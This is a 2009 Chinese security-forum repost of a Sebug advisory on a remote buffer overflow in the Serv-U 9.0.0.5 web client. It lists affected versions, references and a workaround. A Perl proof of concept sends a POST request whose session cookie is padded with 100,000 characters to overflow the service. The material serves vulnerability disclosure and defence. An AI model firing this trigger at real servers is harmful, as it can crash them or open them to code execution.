标题:
Serv-U Web客户端HTTP请求远程溢出漏洞
[打印本页]
作者:
zclzhao
时间:
2009-11-7 10:22
标题:
Serv-U Web客户端HTTP请求远程溢出漏洞
影响版本:
RhinoSoft Serv-U 9.0.0.5漏洞描述:
BUGTRAQ ID: 36895
Serv-U FTP是一款FTP服务程序。
Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。<*参考
http://www.rangos.de/ServU-ADV.txt
http://secunia.com/advisories/37228/
*>
测试方法:
[
www.sebug.net
]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!---snip---
use IO::Socket;
$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => ’80’,
Proto => ’tcp’);
print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";
while (<$sock>) {
print;
}
---snip---
SEBUG安全建议:
临时解决方法:
* 禁用WebClient服务,仅使用Serv-U FTP/SFTP组件。
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2